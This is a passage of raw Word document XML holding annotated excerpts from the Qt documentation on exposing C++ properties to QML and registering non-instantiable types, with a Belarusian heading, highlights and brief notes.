    <w:p w:rsidR="00B170D3" w:rsidRPr="00DA77C2" w:rsidRDefault="00B170D3" w:rsidP="00B170D3">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The type can be used in an</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId197" w:anchor="object-declarations" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>object declaration</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from QML, and its properties can be read and written to, as per the example below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B170D3" w:rsidRPr="00DA77C2" w:rsidRDefault="00B170D3" w:rsidP="00B170D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lastRenderedPageBreak/>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> com</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mycompany</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messaging </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B170D3" w:rsidRPr="00DA77C2" w:rsidRDefault="00B170D3" w:rsidP="00B170D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B170D3" w:rsidRPr="00DA77C2" w:rsidRDefault="00B170D3" w:rsidP="00B170D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Message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B170D3" w:rsidRPr="00DA77C2" w:rsidRDefault="00B170D3" w:rsidP="00B170D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author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"Amelie"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B170D3" w:rsidRPr="00DA77C2" w:rsidRDefault="00B170D3" w:rsidP="00B170D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creationDate</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new</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Date</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B170D3" w:rsidRPr="00DA77C2" w:rsidRDefault="00B170D3" w:rsidP="00B170D3">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B170D3" w:rsidRDefault="00B170D3" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B307B1" w:rsidRPr="00B307B1" w:rsidRDefault="00490E7E" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId198" w:history="1">
        <w:r w:rsidR="00B307B1" w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/properties.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B307B1" w:rsidRPr="00B307B1" w:rsidRDefault="00B307B1" w:rsidP="00B170D3">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="_Toc483603940"/>
      <w:bookmarkStart w:id="264" w:name="_Toc483605160"/>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Метапраграмаванне ў кт і яго перавагі</w:t>
      </w:r>
      <w:bookmarkEnd w:id="263"/>
      <w:bookmarkEnd w:id="264"/>
    </w:p>
    <w:p w:rsidR="00B307B1" w:rsidRPr="00B170D3" w:rsidRDefault="00B307B1" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Accessing a property through its</w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WRITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>accessor is the better of the two, because it is faster and gives better diagnostics at compile time, but setting the property this way requires that you know about the class at compile time. Accessing properties by name lets you access classes you don't know about at compile time. You can</w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>discover</w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a class's properties at run time by querying its</w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId199" w:history="1">
        <w:r w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId200" w:history="1">
        <w:r w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QMetaObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId201" w:history="1">
        <w:r w:rsidRPr="00B307B1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QMetaProperties</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B307B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B307B1" w:rsidRDefault="00B307B1" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00B170D3">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="265" w:name="registering-non-instantiable-types"/>
      <w:bookmarkStart w:id="266" w:name="_Toc483000588"/>
      <w:bookmarkStart w:id="267" w:name="_Toc483003609"/>
      <w:bookmarkStart w:id="268" w:name="_Toc483603941"/>
      <w:bookmarkStart w:id="269" w:name="_Toc483605161"/>
      <w:bookmarkEnd w:id="265"/>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Registering Non-Instantiable Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="266"/>
      <w:bookmarkEnd w:id="267"/>
      <w:bookmarkEnd w:id="268"/>
      <w:bookmarkEnd w:id="269"/>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Sometimes a</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId202" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QObject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-derived class may need to be registered with the QML type system but not as an instantiable type. For example, this is the case if a C++ class:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is an </w:t>
      </w:r>
      <w:r w:rsidRPr="00712AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interface type</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that should not be instantiable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00712AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>base class type that does not need to be exposed to QML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>declares some enum</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that should be accessible from QML, but otherwise should not be instantiable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00DA77C2" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is a type that should be provided to QML </w:t>
      </w:r>
      <w:r w:rsidRPr="00712AE2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>through a singleton instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and should not be instantiable from QML</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00712AE2" w:rsidRPr="00712AE2" w:rsidRDefault="00712AE2" w:rsidP="00DA77C2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>intbu using context of this cases</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The</w:t>
      </w:r>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId203" w:history="1">
        <w:r w:rsidRPr="00DA77C2">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B170D3">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA77C2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module provides several methods for registering non-instantiable types:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA77C2" w:rsidRPr="00DA77C2" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId204" w:anchor="qmlRegisterType" w:history="1">
        <w:r w:rsidR="00DA77C2" w:rsidRPr="00B170D3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlRegisterType</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DA77C2" w:rsidRPr="00B170D3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>() (with no parameters)</w:t>
      </w:r>
